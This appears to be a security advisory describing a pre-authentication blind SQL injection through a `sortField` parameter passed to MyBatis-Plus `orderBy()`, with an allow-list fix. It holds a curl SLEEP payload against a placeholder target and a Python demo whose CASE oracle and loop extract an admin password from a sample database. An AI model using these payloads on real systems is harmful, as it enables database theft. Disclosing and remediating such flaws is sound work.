# [Security] SQL Injection via sortField parameter in multiple unauthenticated endpoints #4

## Vulnerability Overview

- **Vulnerability Type**: SQL Injection (Time-based Blind SQL Injection)
- **Description**: The `sortField` parameter in `PageRequest` is passed directly to MyBatis-Plus's `orderBy()` method without any validation, so attacker-controlled text lands in the ORDER BY clause of the generated SQL. Column names in ORDER BY cannot be bound as prepared-statement parameters, which is why parameterised queries do not protect this position and the value must be validated instead.
- **Affected Endpoints**:
  - `POST /api/picture/list/page/v0`
  - `POST /api/space/list/page/v0`
  - These endpoints are accessible without authentication.

## Impact Scope

- **Affected Versions**: All versions (up to the latest master branch).
- **Affected Code**:
  - `PictureServiceImpl.java` (Line 338) - No authentication required
  - `SpaceServiceImpl.java` (Line 622) - No authentication required
  - `UserServiceImpl.java` (Line 240) - Requires administrator role
- **Impact**:
  - Exploitable without authentication (Pre-Auth).
  - Attackers can extract arbitrary data from the database (such as user credentials, administrator passwords, etc.) via time-based blind SQL injection: each injected request leaks one bit (delay or no delay), and the whole value is recovered by repeating the request.

## Remediation

- **Fixing PR**: #3
- The `sortField` value must be compared against an allow-list of sortable column names (and `sortOrder` against the two accepted directions) before it is handed to `orderBy()`; escaping or quoting the value is not a substitute, because a column name in ORDER BY is an identifier, not a string literal.

## POC Code

```bash
curl -w "\nTime: %{time_total}s\n" -X POST http://TARGET:port/api/picture/list/page/v0 \
  -H "Content-Type: application/json" \
  -d '{"sortField":"(SELECT 1 FROM (SELECT SLEEP(3)) t)","sortOrder":"ascend","current":1,"pageSize":10}'
```

**Verification Instructions**:

- Normal request (`sortField: "id"`) response time is approximately 0.02s.
- Injected request response time is approximately 3.0s, confirming that `SLEEP` was executed.
- To rule out ordinary latency or server load, repeat the injected request with a different `SLEEP` argument (for example 6) and confirm that the delay scales with it.
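The following is an added example, not code from the project or from the fixing PR. It reproduces the vulnerable pattern (the sort field concatenated into ORDER BY) and the allow-list check that remediates it, using an in-memory SQLite database with constructed rows and hypothetical column names (`id`, `name`, `role`, `password`). SQLite has no `SLEEP()`, so instead of the page's time-based payload it uses the boolean variant of the same technique: a `CASE` expression in ORDER BY that sorts by one column when a guess about the admin password is correct and by another when it is not, so the row order itself becomes the oracle. On MySQL the `SLEEP(3)` subquery from the POC plays the same role with response time as the signal.

```python
import sqlite3

# Hypothetical allow-list of sortable columns; a real one must list exactly the
# entity columns the endpoint is meant to sort on, nothing else.
ALLOWED_SORT_FIELDS = {"id", "name", "create_time"}
SORT_ORDERS = {"ascend": "ASC", "descend": "DESC"}


def build_query_unsafe(sort_field, sort_order):
    # Vulnerable: sortField is pasted into ORDER BY without validation, the same
    # thing that happens when the raw request value reaches orderBy().
    direction = "ASC" if sort_order == "ascend" else "DESC"
    return f"SELECT id, name FROM user ORDER BY {sort_field} {direction}"


def build_query_safe(sort_field, sort_order):
    # Hardened: only known column names and known directions are accepted.
    if sort_field not in ALLOWED_SORT_FIELDS:
        raise ValueError(f"unsupported sortField: {sort_field!r}")
    if sort_order not in SORT_ORDERS:
        raise ValueError(f"unsupported sortOrder: {sort_order!r}")
    return f"SELECT id, name FROM user ORDER BY {sort_field} {SORT_ORDERS[sort_order]}"


def is_accepted(sort_field, sort_order):
    # Convenience wrapper so callers can ask whether the input would be rejected.
    try:
        build_query_safe(sort_field, sort_order)
        return True
    except ValueError:
        return False


def make_db():
    # Constructed sample data: one admin row whose password the attacker wants.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE user (id INTEGER, name TEXT, role TEXT, password TEXT)")
    conn.executemany(
        "INSERT INTO user VALUES (?, ?, ?, ?)",
        [
            (1, "zed", "admin", "s3cret"),
            (2, "amy", "user", "hunter2"),
            (3, "bob", "user", "passw0rd"),
        ],
    )
    return conn


def order_of_ids(conn, sql):
    return [row[0] for row in conn.execute(sql)]


def oracle_payload(position, guess):
    # Boolean counterpart of the page's SLEEP payload: when the guessed character
    # is right the rows are sorted by id, otherwise by name, so the order leaks
    # one true/false answer per request.
    return (
        f"(CASE WHEN (SELECT substr(password,{position},1) FROM user "
        f"WHERE role='admin')='{guess}' THEN id ELSE name END)"
    )


def leak_admin_password(conn, length):
    # Recover the admin password one character at a time through the unsafe
    # builder, using only the returned row order as the signal.
    baseline = order_of_ids(conn, build_query_unsafe("id", "ascend"))
    alphabet = "abcdefghijklmnopqrstuvwxyz0123456789"
    recovered = ""
    for position in range(1, length + 1):
        for ch in alphabet:
            sql = build_query_unsafe(oracle_payload(position, ch), "ascend")
            if order_of_ids(conn, sql) == baseline:
                recovered += ch
                break
    return recovered


if __name__ == "__main__":
    db = make_db()
    print("leaked via unsafe ORDER BY:", leak_admin_password(db, 6))
    print("payload accepted by allow-list:", is_accepted(oracle_payload(1, "s"), "ascend"))
```

The same check belongs in the Java services before `orderBy()` is called: compare `sortField` against a fixed set of column names and reject or default anything else, rather than trying to escape the value. Note that the leak works even though the query returns no password column and raises no error; the only observable is which row comes first, which is why ORDER BY injection is fully exploitable despite sitting outside WHERE.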